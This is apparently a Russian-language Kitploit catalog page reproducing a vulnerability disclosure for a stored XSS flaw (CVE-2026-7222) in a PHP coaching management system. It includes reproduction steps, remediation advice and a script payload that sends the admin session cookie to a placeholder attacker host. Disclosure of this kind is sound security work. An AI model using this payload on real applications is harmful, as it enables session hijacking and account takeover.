Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-7222-XSS | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-7222-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Хранимая межсайтовая XSS-уязвимость в системе управления репетиторством приводит к захвату учётной записи


Продукт

Система управления репетиторством на PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


Затронутые компоненты

  • /modules/student/complaint.php (отправка жалобы)
  • /modules/admin/incomingcomplaint.php (просмотр жалобы)
  • Функциональность ответа на жалобу (Администратор/Преподаватель → Студент)

Версия

Неизвестно (производитель не предоставил информацию о версии; протестировано на последней доступной версии с Code-Projects.org по состоянию на апрель 2026 года)


Тип уязвимости

CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы (хранимый межсайтовый скриптинг)


Описание

Приложение не выполняет надлежащую очистку вводимых пользователем данных в функциональности жалоб и ответов. Вредоносный JavaScript, внедрённый пользователем с низкими привилегиями, сохраняется и выполняется при просмотре пользователями с более высокими привилегиями, такими как администраторы или преподаватели.

Кроме того, функциональность ответов также уязвима, что позволяет администраторам или преподавателям внедрять JavaScript, который выполняется в сессиях студентов.

Это приводит к хранимой XSS-уязвимости, затрагивающей несколько ролей пользователей.


Шаги воспроизведения

Случай 1: Студент → Администратор (повышение привилегий)

  1. Войдите как студент

  2. Перейдите к: /modules/student/complaint.php Screenshot 2026-04-10 212940

  3. Отправьте жалобу со следующей полезной нагрузкой:

root@kitploit:~
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Screenshot 2026-04-10 213341
  1. Войдите как администратор

  2. Перейдите к: /modules/admin/incomingcomplaint.php Screenshot 2026-04-10 212951

  3. Когда администратор просматривает жалобу, полезная нагрузка выполняется автоматически

  4. Cookie сессии администратора отправляется на сервер, контролируемый атакующим

  5. Используйте украденный cookie сессии, чтобы перехватить сессию администратора Screenshot 2026-04-10 213350

    Screenshot 2026-04-10 213406

Случай 2: Администратор → Студент (обратная XSS)

  1. Войдите как администратор
  2. Ответьте на жалобу, используя полезную нагрузку:
root@kitploit:~
  1. Войдите как студент
  2. Просмотрите ответ на жалобу

Доказательства PoC

  • Выполнение JavaScript подтверждено в панели администратора при просмотре вредоносной жалобы
  • Cookie сессии (PHPSESSID) успешно экфильтрован на сервер, контролируемый атакующим
  • Сессия администратора перехвачена с использованием украденного cookie
  • Выполнение JavaScript подтверждено в панели студента через функциональность ответов

Воздействие

  • Пользователи с низкими привилегиями (студенты) могут выполнять произвольный JavaScript в контексте администратора
  • Приводит к перехвату сессии из-за отсутствия флага HttpOnly
  • Полный захват учётной записи администратора
  • Двунаправленная XSS позволяет скомпрометировать несколько ролей (Администратор, Преподаватель, Студент)
  • Полная компрометация целостности, конфиденциальности и доступности приложения

Серьёзность: CRITICAL


Корневая причина

  • Отсутствие очистки входных данных
  • Отсутствие кодирования вывода
  • Отсутствие защитных мер для session cookies (флаг HttpOnly не установлен)

Рекомендации

  • Очищайте и проверяйте все пользовательские вводы.
  • Кодируйте вывод с помощью таких функций, как htmlspecialchars() в PHP
  • Устанавливайте флаги HttpOnly и Secure для session cookies
  • Внедряйте Content Security Policy (CSP)

Скачать инструмент